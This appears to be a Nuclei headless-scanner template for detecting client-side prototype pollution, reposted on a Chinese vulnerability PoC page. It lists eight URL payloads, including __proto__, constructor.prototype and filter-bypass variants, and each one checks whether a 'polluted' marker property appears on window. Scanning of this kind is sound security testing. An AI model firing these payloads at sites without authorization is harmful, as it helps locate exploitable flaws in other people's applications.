prototype-pollution-check: Prototype Pollution Check

PoC代码[已公开]

id: prototype-pollution-check

info:
  name: Prototype Pollution Check
  author: pdteam
  severity: medium
  metadata:
    max-request: 8
    verified: true
  tags: headless,vuln

headless:
  - steps:
      - args:
          url: "{{BaseURL}}?constructor[prototype][vulnerableprop]=polluted#constructor[prototype][vulnerableprop]=polluted"
        action: navigate

      - action: waitload

      - action: script
        name: extract1
        args:
          code: |
            () => {
             return window.vulnerableprop
            }
    matchers:
      - type: word
        part: extract1
        words:
          - "polluted"

  - steps:
      - args:
          url: "{{BaseURL}}?constructor.prototype.vulnerableprop=polluted#constructor.prototype.vulnerableprop=polluted"
        action: navigate

      - action: waitload

      - action: script
        name: extract2
        args:
          code: |
            () => {
             return window.vulnerableprop
            }
    matchers:
      - type: word
        part: extract2
        words:
          - "polluted"

  - steps:
      - args:
          url: "{{BaseURL}}?__proto__[vulnerableprop]=polluted#__proto__.vulnerableprop=polluted&__proto__[vulnerableprop]=polluted"
        action: navigate

      - action: waitload

      - action: script
        name: extract3
        args:
          code: |
            () => {
             return window.vulnerableprop
            }
    matchers:
      - type: word
        part: extract3
        words:
          - "polluted"

  - steps:
      - args:
          url: "{{BaseURL}}?__proto__.vulnerableprop=polluted"
        action: navigate

      - action: waitload

      - action: script
        name: extract4
        args:
          code: |
            () => {
             return window.vulnerableprop
            }
    matchers:
      - type: word
        part: extract4
        words:
          - "polluted"

  - steps:
      - args:
          url: "{{BaseURL}}?__pro__proto__to__[vulnerableprop]=polluted"
        action: navigate

      - action: waitload

      - action: script
        name: extract5
        args:
          code: |
            () => {
             return window.vulnerableprop
            }
    matchers:
      - type: word
        part: extract5
        words:
          - "polluted"

  - steps:
      - args:
          url: "{{BaseURL}}?__pro__proto__to__.vulnerableprop=polluted"
        action: navigate

      - action: waitload

      - action: script
        name: extract6
        args:
          code: |
            () => {
             return window.vulnerableprop
            }
    matchers:
      - type: word
        part: extract6
        words:
          - "polluted"

  - steps:
      - args:
          url: "{{BaseURL}}?constconstructorructor[protoprototypetype][vulnerableprop]=polluted"
        action: navigate

      - action: waitload

      - action: script
        name: extract7
        args:
          code: |
            () => {
             return window.vulnerableprop
            }
    matchers:
      - type: word
        part: extract7
        words:
          - "polluted"

  - steps:
      - args:
          url: "{{BaseURL}}?constconstructorructor.protoprototypetype.vulnerableprop=polluted"
        action: navigate

      - action: waitload

      - action: script
        name: extract8
        args:
          code: |
            () => {
             return window.vulnerableprop
            }

    matchers:
      - type: word
        part: extract8
        words:
          - "polluted"
# digest: 490a00463044022019a45f47ab82b37c73a40d6116a659fc7fee313d6385b758458cb99d62a6ba5f022037f136146fdc0b51edd200db9ce11a0936a5f3b48e2442562c5037a57cd0987b:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/headless/prototype-pollution-check.yaml

prototype-pollution-check: Prototype Pollution Check

漏洞描述

PoC代码[已公开]

相关漏洞推荐